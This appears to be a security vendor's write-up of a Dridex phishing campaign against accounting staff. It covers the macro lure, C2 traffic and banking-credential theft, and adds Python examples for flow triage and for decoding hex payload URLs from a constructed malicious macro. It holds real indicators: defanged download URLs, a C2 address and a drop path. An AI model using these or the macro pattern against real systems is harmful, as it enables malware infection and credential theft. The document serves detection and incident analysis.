Dridex Attacks Target Corporate Accounting
In February, Cisco Managed Threat Defense (MTD) security investigators detected a rash of Dridex credential-stealing malware delivered via Microsoft Office macros. The campaign is effective, and the lures appear targeted at staff responsible for handling purchase orders and invoices. Here's a breakdown of the emails we've observed phishing employees and planting trojans on their devices.
Attackers have been creating new variants of the Dridex infostealer and sending them out via botnets every few days for the past several months, as the Talos Group reported in December. The same group of attackers has been operating botnets of Dridex-infected computers since October 2014. The Dridex botnets are referenced by number: for example, the number 120, found in the trojan's configuration file, ties this victim to botnet 120. This incident describes an email attack campaign that distributes the Dridex infostealer and controls it via botnet 120.
Victims Tricked into Enabling Macros
Recall that Microsoft Office macros were a common malware delivery vehicle from 1996 to 2002. Around 2002, Microsoft changed the default Office installation so that macros no longer run automatically when a document containing them is opened. In October 2014, attackers adapted by tricking users into enabling macros themselves, as you'll see in this incident.
Here’s the fake invoice our victim received.
Cisco MTD telemetry indicates that the victim read this email via Outlook webmail at gadgets.live.com at 14:17:37 UTC. About an hour and a half later, at 15:44:49 UTC, the user opened the email attachment, named 14109KW.doc, and enabled macros. This started the infection process that installed the Dridex infostealer.
Cisco MTD analysis of the document with ExifTool found that it contained no text characters.
Document metadata indicates that the computer it was created on was in a country using the Cyrillic alphabet.
File Size: 50688 bytes
SHA256 hash: 84ef5406a61b4fb0703768a120e9f107d569387276357d88ef77c936c1ec109a
MD5 hash: dda0e41140a88f59ca25f4f987a8e862
When the user opened the document, they saw the following blank document.
Probably thinking that enabling macros would make the document display correctly, the victim enabled macros, which triggered the malicious payload.
Cisco MTD investigators use IP lists from botnet trackers to hunt for Dridex connections, correlating related alerts and full packet capture to verify the compromise. In this case, a victim was discovered exfiltrating data to the Dridex botnet, as illustrated below.
Correlation with Alerts and Packet Capture
Once the connection was observed, the Cisco MTD investigator searched for correlating events to confirm the breach. The Sourcefire retrospective file event below demonstrated that the compromise was progressing. Because antivirus detection was low, neither the malicious document nor the malware downloaded by the macro was blocked by endpoint controls, and the final payload, the Dridex trojan, started running on the target host. Here's the initial alert.
Once the investigator observed the malicious file alert, he searched for and correlated an HTTP POST connection to the Dridex malware command and control (C2) server. Using full packet capture, the Cisco MTD investigator analyzed the HTTP POST and found the final confirmation: the telltale Dridex indicators inside the HTTP header, shown below.
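The two-pass triage described above, a tracker IP list applied to flow records and then confirmation from HTTP metadata, is sketched below as an added example. This is not Cisco MTD's tooling: the flow-line format, the proxy-style HTTP summaries and the second tracker address are constructed for the illustration, and the only real values are the C2 address and the 379,549-byte response size from this write-up. The Dridex-specific HTTP header indicators are not reproduced on this page, so the confirmation step here stops at "a POST to a listed IP with a large response", which is a lead to verify in packet capture rather than a final verdict.

```python
import re

# Constructed botnet-tracker list. 188.8.131.52 is the C2 address named in
# this write-up; 203.0.113.9 is filler from the TEST-NET-3 documentation range.
C2_IPS = {"188.8.131.52", "203.0.113.9"}

# Constructed flow records in a one-line-per-flow text format invented for
# this example (real NetFlow exports carry different fields).
FLOW_LINES = """\
2015-02-10T15:46:02Z 10.1.2.3:49153 -> 93.184.216.34:443 tcp out=1200 in=9800
2015-02-10T15:51:07Z 10.1.2.3:49160 -> 188.8.131.52:80 tcp out=2400 in=379549
2015-02-10T15:52:11Z 10.1.2.7:51002 -> 203.0.113.9:8080 tcp out=300 in=140
"""

# Constructed HTTP request summaries, as a proxy log or packet-capture tool
# would report them for the same hosts.
HTTP_REQUESTS = [
    {"src": "10.1.2.3", "dst": "188.8.131.52", "dport": 80, "method": "POST", "resp_bytes": 379549},
    {"src": "10.1.2.3", "dst": "93.184.216.34", "dport": 443, "method": "GET", "resp_bytes": 9800},
    {"src": "10.1.2.7", "dst": "203.0.113.9", "dport": 8080, "method": "GET", "resp_bytes": 140},
]

FLOW_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"(?P<proto>\w+) out=(?P<out>\d+) in=(?P<in>\d+)$"
)


def parse_flows(text):
    """Parse the constructed flow lines into dicts; lines that do not match are skipped."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line)
        if m is None:
            continue
        f = m.groupdict()
        for key in ("sport", "dport", "out", "in"):
            f[key] = int(f[key])
        flows.append(f)
    return flows


def flows_to_c2(flows, c2_ips):
    """First pass: any flow whose destination is on the tracker list is a lead."""
    return [f for f in flows if f["dst"] in c2_ips]


def confirm_with_http(leads, http_requests):
    """Second pass: a lead is confirmed only if the same src/dst/port carried an
    HTTP POST. The response size is kept because the Dridex configuration
    download is large (379,549 bytes in this case)."""
    confirmed = []
    for f in leads:
        for r in http_requests:
            same_tuple = (r["src"], r["dst"], r["dport"]) == (f["src"], f["dst"], f["dport"])
            if same_tuple and r["method"] == "POST":
                confirmed.append({**f, "resp_bytes": r["resp_bytes"]})
    return confirmed


def triage(flow_text=FLOW_LINES, http_requests=HTTP_REQUESTS, c2_ips=C2_IPS):
    """Return (leads, confirmed): tracker hits, and the subset backed by a POST."""
    leads = flows_to_c2(parse_flows(flow_text), c2_ips)
    return leads, confirm_with_http(leads, http_requests)


if __name__ == "__main__":
    leads, confirmed = triage()
    for f in leads:
        print("lead:", f["src"], "->", f["dst"], "port", f["dport"])
    for c in confirmed:
        print("confirmed POST to C2:", c["src"], "->", c["dst"],
              "response", c["resp_bytes"], "bytes")
```

On the constructed data both tracker hits surface as leads, but only the 10.1.2.3 host is confirmed: its flow to 188.8.131.52 matches a POST with the large response, while the 10.1.2.7 flow to the second listed address only carried a GET and stays a lead for manual review. Keeping the two passes separate is the point: a tracker list alone produces hits on stale or shared infrastructure, and the flow record alone cannot tell a POST from a GET.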
Uncovering the Dridex Configuration Files
The server at IP address 188.8.131.52 is located in Russia and has been used to host malware for the past 11 months.
The server answered the POST with a large transfer of 379,549 bytes containing configuration information for the Dridex malware. This file tells the malware which websites to intercept user passwords from; specifically, it lists 338 online banking websites, most of them in Europe, the UK, or Asia. If an infected victim visits one of these banks' websites, the malware copies the authentication credentials and sends them to the Dridex botnet.
As an added capability, Dridex can inject HTML as the bank websites are displayed to ask the user for extra information, such as their Social Security number or ATM PIN, at login. This extra information is also sent to the botnet to be used for financial fraud and identity theft.
The packets captured during this attack enabled the investigator to study the downloader hidden inside the macro. It was obfuscated with random code that is never called, so as to evade the detection controls found in antivirus software. Buried in all the junk code was this string of hex-encoded values:
When macros are enabled and the macro runs, this string of hex values is converted to ASCII to form the URL of the payload:
The EXE downloaded by the macro is saved as %TEMP%\dsHHH.exe on the host. At the time of analysis, only 7 of 57 antivirus engines detected this binary as malware.
Cisco MTD research found that variations of the macro used in this attack fetched the Dridex download from different locations, including:
hxxp://92[.]63[.]87[.]40/aksjdderwd/asdbwk/dhoei.exe
hxxp://95[.]163[.]121[.]217/aksjdderwd/asdbwk/dhoei.exe
hxxp://95[.]163[.]121[.]219/aksjdderwd/asdbwk/dhoei.exe
hxxp://62[.]76[.]188[.]221/aksjdderwd/asdbwk/dhoei.exe
Upon execution, the EXE drops a DLL file, which only 3 of 57 antivirus engines detected as malicious. This DLL implements the infostealer functions of Dridex and communicates with the Dridex botnet. To do so, it uses a configuration file containing the botnet number and the IP addresses of the botnet servers:
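The hex-to-ASCII trick described above is simple to reverse once the macro text is in hand, and it generalizes: a small scanner that pulls long hex string literals out of VBA, decodes the ones that yield printable text and defangs any URL it finds will recover the payload location from this family of macros without running them. The following is an added example, not the macro from the incident: the sample VBA text is constructed here, its hex string is built from the first download URL listed above, the junk statements and identifiers (`NeverCalled`, `FetchAndRun`, `DecodeHex`) are invented, and the only real values are the URL and the `%TEMP%\dsHHH.exe` drop path from the page.

```python
import re

# The payload URL from this write-up, used only to build the constructed sample.
PAYLOAD_URL = "http://92.63.87.40/aksjdderwd/asdbwk/dhoei.exe"

# Constructed macro text imitating the obfuscation style described above:
# junk code that never executes, a decoy hex literal, and the real hex string.
# Every procedure name here is invented for the illustration.
SAMPLE_MACRO = f'''
Sub AutoOpen()
    Dim zq As Integer
    zq = 7                         ' junk: assigned, never used
    If zq = 99 Then Call NeverCalled
    Dim blob As String
    blob = "0001020304050607"      ' decoy: valid hex, but not printable text
    Dim dhh As String
    dhh = "{PAYLOAD_URL.encode().hex()}"
    Call FetchAndRun(DecodeHex(dhh), Environ("TEMP") & "\\dsHHH.exe")
End Sub
'''

# Quoted string literals of at least 16 hex digits; shorter ones are too noisy.
HEX_LITERAL = re.compile(r'"([0-9A-Fa-f]{16,})"')
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)


def decode_hex_literals(vba: str) -> list[str]:
    """Return every hex string literal in the macro that decodes to printable ASCII."""
    decoded = []
    for m in HEX_LITERAL.finditer(vba):
        digits = m.group(1)
        if len(digits) % 2:          # odd length cannot be a byte string
            continue
        data = bytes.fromhex(digits)
        try:
            text = data.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable():       # drops the decoy (control bytes 0x00-0x07)
            decoded.append(text)
    return decoded


def defang(url: str) -> str:
    """Defang in the hxxp://1[.]2[.]3[.]4/path style used in this write-up."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def extract_payload_urls(vba: str) -> list[str]:
    """Decode hex literals, pick out URLs, and return them defanged for reporting."""
    urls = []
    for text in decode_hex_literals(vba):
        urls.extend(defang(u) for u in URL_RE.findall(text))
    return urls


if __name__ == "__main__":
    for u in extract_payload_urls(SAMPLE_MACRO):
        print("payload URL:", u)
```

The decoy literal shows why the printable-text filter matters: it is well-formed hex, so a scanner that decodes everything would emit eight control bytes as a "finding". Real samples also spread the hex across concatenated literals or feed it through a `Chr`/`Mid` loop; the approach is the same, but the literal regex has to be widened to join the pieces before decoding.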
This case shows the value of intersecting security intelligence with network forensics via NetFlow. Vigilant detection is necessary to catch advanced threats, since they are designed to evade existing security controls such as antivirus software. These tools, along with confirmation via full packet capture, enabled investigators to detect the malware, confirm the breaches, trace the origin of the attacks, and guide the customer to safely mitigate the threat. Armed with this understanding, the customer changed at-risk passwords with pinpoint precision and warned users to watch for this new phishing campaign, advising them not to enable macros in unexpected documents.